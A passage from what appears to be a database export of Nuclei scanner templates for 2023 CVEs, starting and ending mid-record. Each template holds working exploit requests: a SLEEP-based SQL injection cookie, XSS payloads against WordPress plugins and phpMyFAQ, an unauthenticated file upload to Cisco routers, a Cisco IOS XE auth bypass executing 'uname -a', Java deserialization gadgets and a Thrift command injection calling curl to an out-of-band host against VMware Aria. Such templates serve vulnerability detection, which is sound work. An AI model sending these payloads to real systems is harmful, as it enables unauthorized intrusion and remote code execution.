CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1730\n cwe-id: CWE-89\n epss-score: 0.05497\n epss-percentile: 0.93034\n cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: supportcandy\n product: supportcandy\n framework: wordpress\n tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Cookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"supportcandy\")'\n condition: and\n# digest: 4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950", "hash": "c5b5a33e71d254d77dbd433f895883ad", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860e" }, "name": "CVE-2023-1780.yaml", "content": "id: CVE-2023-1780\n\ninfo:\n name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n remediation: Fixed in version 4.5.3\n reference:\n - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1780\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1780\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.2903\n cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: codeermeneer\n product: companion_sitemap_generator\n framework: 
wordpress\n publicwww-query: \"/wp-content/plugins/companion-sitemap-generator/\"\n tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"re not allowed to view\")'\n - 'contains(body_2, \"\")'\n condition: and\n# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950", "hash": "495174baf7aa0dc0535fed11d0649e12", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860f" }, "name": "CVE-2023-1835.yaml", "content": "id: CVE-2023-1835\n\ninfo:\n name: Ninja Forms < 3.6.22 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341\n - https://wordpress.org/plugins/ninja-forms/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1835\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1835\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29003\n cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ninjaforms\n product: ninja_forms\n framework: wordpress\n tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Ninja Forms\")'\n condition: and\n# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950", "hash": "716dd8379c3722851de86aded3e6bc14", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308610" }, "name": "CVE-2023-1880.yaml", 
"content": "id: CVE-2023-1880\n\ninfo:\n name: Phpmyfaq v3.1.11 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n remediation: Fixed in 3.1.12 Version.\n reference:\n - https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1880\n - https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1880\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.3203\n cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phpmyfaq\n product: phpmyfaq\n shodan-query: http.html:\"phpmyfaq\"\n tags: cve2023,cve,huntr,xss,phpmyfaq\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"phpmyfaq\") && contains(body, \"\")'\n - 'contains(content_type, \"text/html\")'\n condition: and\n# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950", "hash": "1eebbdcd9896c6ae0305e96e36bdcdef", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308611" }, "name": "CVE-2023-1890.yaml", "content": "id: CVE-2023-1890\n\ninfo:\n name: Tablesome < 1.0.9 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 1.0.9.\n reference:\n - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d\n - https://wordpress.org/plugins/tablesome/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1890\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1890\n cwe-id: CWE-79\n epss-score: 0.00203\n epss-percentile: 0.57653\n cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: pauple\n product: tablesome\n framework: wordpress\n tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"tablesome\")'\n condition: and\n# digest: 4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950", "hash": "9439602d6ef2f375350df3b218b6216e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308612" }, "name": 
"CVE-2023-20073.yaml", "content": "id: CVE-2023-20073\n\ninfo:\n name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload\n author: princechaddha,ritikchaddha\n severity: critical\n description: |\n A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches provided by Cisco to mitigate this vulnerability.\n reference:\n - https://unsafe.sh/go-173464.html\n - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f\n - https://github.com/RegularITCat/CVE-2023-20073/tree/main\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20073\n - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-20073\n cwe-id: CWE-434\n epss-score: 0.38542\n epss-percentile: 0.97132\n cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cisco\n product: rv340_firmware\n fofa-query: app=\"CISCO-RV340\" || app=\"CISCO-RV340W\" || app=\"CISCO-RV345\" || app=\"CISCO-RV345P\"\n tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive\nvariables:\n html_comment: \"\" # Random string as HTML comment to append in response body\n\nhttp:\n - raw:\n - |\n GET /index.html HTTP/1.1\n Host: {{Hostname}}\n - 
|\n POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\n Host: {{Hostname}}\n Authorization: 1\n Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"pathparam\"\n\n Portal\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"fileparam\"\n\n index.html\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"file.path\"\n\n index.html\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"file\"; filename=\"index.html\"\n Content-Type: application/octet-stream\n\n {{index}}\n {{html_comment}}\n\n --------------------------f6f99e26f3a45adf--\n - |\n GET /index.html HTTP/1.1\n Host: {{Hostname}}\n\n extractors:\n - type: dsl\n name: index\n internal: true\n dsl:\n - body_1\n matchers:\n - type: word\n part: body_3\n words:\n - \"{{html_comment}}\"\n# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950", "hash": "4386559404be5f63398bf634d2fce73c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308613" }, "name": "CVE-2023-2009.yaml", "content": "id: CVE-2023-2009\n\ninfo:\n name: Pretty Url <= 1.5.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n reference:\n - https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2009\n - https://wordpress.org/plugins/pretty-url/\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-2009\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.3232\n cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: pretty_url_project\n product: pretty_url\n framework: wordpress\n tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log=((username))&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"prettyurls\")'\n condition: and\n\n extractors:\n - type: regex\n internal: true\n name: nonce\n part: body\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-z]+)\" />'\n# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950", "hash": "b52d25c6d698c3b89a25b209eb65504d", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308614" }, "name": "CVE-2023-20198.yaml", "content": "id: CVE-2023-20198\n\ninfo:\n name: Cisco IOS XE - Authentication Bypass\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: |\n Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of 
Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\n For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\n Cisco will provide updates on the status of this investigation and when a software patch is available.\n impact: |\n The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.\n reference:\n - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/\n - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/\n - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z\n - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities\n - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2023-20198\n epss-score: 0.92151\n epss-percentile: 0.98755\n cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cisco\n product: ios_xe\n shodan-query: http.html_hash:1076109428\n note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.\n tags: cve2023,cve,kev,cisco,rce,auth-bypass\nvariables:\n cmd: uname -a\n\nhttp:\n - raw:\n - |-\n POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\n Host: {{Hostname}}\n\n 
admin***** {{cmd}}\n\n matchers:\n - type: regex\n part: body\n regex:\n - XMLSchema\n - execLog\n - Cisco Systems\n - \n - \n condition: and\n\n extractors:\n - type: regex\n part: body\n group: 1\n regex:\n - \\n(.*)\\[\n# digest: 490a0046304402204b6c30a90e6cf37aa7916fdb2aa34c90e17498b711af7c429834fbea028f05810220647873d5d55dd1e9af9ad701d9f44d1cd41765c1ab655050cf34f6bf140499e6:922c64590222798bb761d5b6d8e72950", "hash": "b37fa3e9180fe101312f5b7bdccf7ae2", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308615" }, "name": "CVE-2023-2023.yaml", "content": "id: CVE-2023-2023\n\ninfo:\n name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 3.7.3\n reference:\n - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317\n - https://wordpress.org/plugins/custom-404-pro/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2023\n - https://github.com/GREENHAT7/pxplan\n - https://github.com/thatformat/Hvv2023\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-2023\n cwe-id: CWE-79\n epss-score: 0.00374\n epss-percentile: 0.722\n cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: kunalnagar\n product: custom_404_pro\n framework: wordpress\n tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(content_type_2, \"text/html\")\n - contains(body_2, \"onanimationstart=alert(document.domain)//\")\n - contains(body_2, \"Custom 404 Pro\")\n condition: and\n# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950", "hash": "79d7fc47b8020f77ec35ce5c17c95f58", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { 
"$oid": "66477a413521042ccf308616" }, "name": "CVE-2023-20864.yaml", "content": "id: CVE-2023-20864\n\ninfo:\n name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: |\n VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2023-0007.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20864\n - https://github.com/Threekiii/CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-20864\n cwe-id: CWE-502\n epss-score: 0.29094\n epss-percentile: 0.96766\n cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vmware\n product: aria_operations_for_logs\n shodan-query: title:\"vRealize Log Insight\"\n tags: cve2023,cve,vmware,aria,rce,oast\n\nhttp:\n - raw:\n - |\n GET /csrf HTTP/1.1\n Host: {{Hostname}}\n X-Csrf-Token: Fetch\n - |\n POST /api/v2/internal/cluster/applyMembership HTTP/1.1\n Host: {{Hostname}}\n X-CSRF-Token: {{xcsrftoken}}\n Content-type: application/octet-stream\n\n {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - '\"errorMessage\":\"Internal error'\n\n extractors:\n - type: kval\n name: xcsrftoken\n group: 1\n internal: true\n kval:\n - \"X_CSRF_Token\"\n# digest: 
4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950", "hash": "6b827968eb67bb31feae2311f77bbc03", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308617" }, "name": "CVE-2023-20887.yaml", "content": "id: CVE-2023-20887\n\ninfo:\n name: VMware VRealize Network Insight - Remote Code Execution\n author: sinsinology\n severity: critical\n description: |\n VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. 
VMWare 6.x version are\n vulnerable.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/\n - https://github.com/sinsinology/CVE-2023-20887\n - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-20887\n cwe-id: CWE-77\n epss-score: 0.96408\n epss-percentile: 0.99538\n cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: vmware\n product: vrealize_network_insight\n shodan-query: title:\"VMware vRealize Network Insight\"\n fofa-query: title=\"VMware vRealize Network Insight\"\n tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev\nvariables:\n cmd: \"curl {{interactsh-url}}\"\n\nhttp:\n - raw:\n - |\n POST /saas./resttosaasservlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-thrift\n\n [1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"rec\":'\n\n - type: word\n part: header\n words:\n - \"application/x-thrift\"\n\n - type: word\n part: body\n negative: true\n words:\n - \"Provided invalid node Id\"\n - \"Invalid nodeId\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950", "hash": "8320139bef0fb993a907481530a7e194", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308618" }, "name": "CVE-2023-20888.yaml", "content": "id: CVE-2023-20888\n\ninfo:\n name: VMware Aria Operations for Networks - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20888\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2023-20888\n cwe-id: CWE-502\n epss-score: 0.35911\n epss-percentile: 0.96766\n cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vmware\n product: vrealize_network_insight\n shodan-query: title:\"VMware Aria Operations\"\n tags: cve2023,cve,vmware,aria,rce,authenticated,oast\n\nhttp:\n - raw:\n - |\n POST /api/auth/login HTTP/2\n Host: {{Hostname}}\n Content-Type: application/json;charset=UTF-8\n X-Vrni-Csrf-Token: null\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n - |\n POST /api/events/push-notifications HTTP/2\n Host: {{Hostname}}\n X-Vrni-Csrf-Token: 
{{csrf}}\n Content-Type: application/json\n\n {\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - dns\n\n - type: status\n status:\n - 500\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'csrfToken\":\"([a-z0-9A-Z/+=]+)\"'\n internal: true\n part: body\n# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950", "hash": "2cbc69f1a0abcbdb7f56f2816bb88f86", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308619" }, "name": "CVE-2023-20889.yaml", "content": "id: CVE-2023-20889\n\ninfo:\n name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Aria Operations for Networks contains an information disclosure vulnerability. 
A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.zerodayinitiative.com/advisories/ZDI-23-842/\n - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20889\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2023-20889\n cwe-id: CWE-77\n epss-score: 0.09004\n epss-percentile: 0.94043\n cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vmware\n product: vrealize_network_insight\n shodan-query: title:\"VMware Aria Operations\"\n tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive\nvariables:\n payload: location='http://{{interactsh-url}}'\n\nhttp:\n - raw:\n - |\n POST /api/auth/login HTTP/2\n Host: {{Hostname}}\n 